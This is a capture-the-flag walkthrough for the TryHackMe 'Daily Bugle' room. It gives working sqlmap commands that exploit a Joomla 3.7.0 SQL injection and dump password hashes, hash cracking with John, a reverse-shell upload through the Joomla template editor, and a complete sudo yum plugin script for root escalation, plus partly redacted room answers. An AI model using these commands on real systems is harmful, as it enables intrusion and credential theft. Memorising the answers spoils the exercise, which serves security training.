TryHackMe Daily Bugle is a challenge to compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

Difficulty: Hard

TryHackMe Daily Bugle

TryHackMe Daily Bugle
TryHackMe Daily Bugle

Daily Bugle WriteUp

Access the web server, who robbed the bank?

TryHackMe Daily Bugle
TryHackMe Daily Bugle

Scan Target Machine with Nmap

nmap -sV -sC --script=vuln  10.10.155.246
TryHackMe Daily Bugle

Find Joomla Version

We have the Joomla version on nmap output but if you need to check it manually

wget http://10.10.204.53/README.txt
TryHackMe Daily Bugle
wget http://10.10.204.53/administrator/manifests/files/joomla.xml 
TryHackMe Daily Bugle

Crack Jonah Password

Crack the Hash? but where is the hash?

We have Joomla CMS with version 3.7.0 and Nmap tell us we have a public exploit, let’s search for it:

searchsploit joomla 3.7.0
TryHackMe Daily Bugle

Great we find one that uses SQLInjection into one vulnerable parameter.

Copy exploit to our home folder:

searchsploit -m 42033.txt
TryHackMe Daily Bugle
less /root/42033.txt

SQLMap Command

Verify All Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Read System Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hex

Read Tables from Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex
TryHackMe Daily Bugle
TryHackMe Daily Bugle

We have 72 tables, what is the users tables?

TryHackMe Daily Bugle

Let’s extract #__users table data hoping to find our Jonah Password Hash

Extract data from #__users tables

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex
TryHackMe Daily Bugle
TryHackMe Daily Bugle
TryHackMe Daily Bugle
TryHackMe Daily Bugle

Crack Jonah Password Hash

john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txt
john jonah_hash.txt --show

Login Joomla Administration as Jonah

http://10.10.204.53/administrator
ũsername - jonah
password - cracked from Hash
TryHackMe Daily Bugle

Upload Reverse Shell to Joomla

http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D
TryHackMe Daily Bugle
TryHackMe Daily Bugle
pwd

Investigate File System

First let’s investigate the Joomla folder

cd /var/www/html
ls -la
TryHackMe Daily Bugle
TryHackMe Daily Bugle

Great we have mysql root password, let’s check if mysql daemon is running as root:

ps -aux | grep mysql*
TryHackMe Daily Bugle

No success Mysql service is running as mysql user 🙁

What if thw user jjamson use the same password as mysql root user?

Let’s try to create a SSH connection as jjameson

ssh [email protected]
TryHackMe Daily Bugle

Find User Flag

TryHackMe Daily Bugle

Elevate Privileges from JJameson user to Root

sudo -l
TryHackMe Daily Bugle

Has we can see jjameson user can execute yum command with sudo, let’s find hot to elevate privileges using yum.

cd /tmp
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y
TryHackMe Daily Bugle

Answer the questions below

What is the Joomla version?

3.7.0

*Instead of using SQLMap, why not use a python script!*

What is Jonah’s cracked password?

spider*RFS*

What is the user flag?

27a260fe3cba712cfde*RFS*

What is the root flag?

eec3d53292b1821868*RFS*

GTFOBins

Exploit Joomla 3.7.0

Room nameDaily Bugle
OSLinux
DifficultyHard
Room Linktryhackme.com/room/dailybugle
CreatorTryhackme

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.

poplabsec

Hacking tips!

We don’t spam! Read our privacy policy for more info.

Categorized in:

TryHackMe, Hacking Playgrounds,

Last Update: November 6, 2023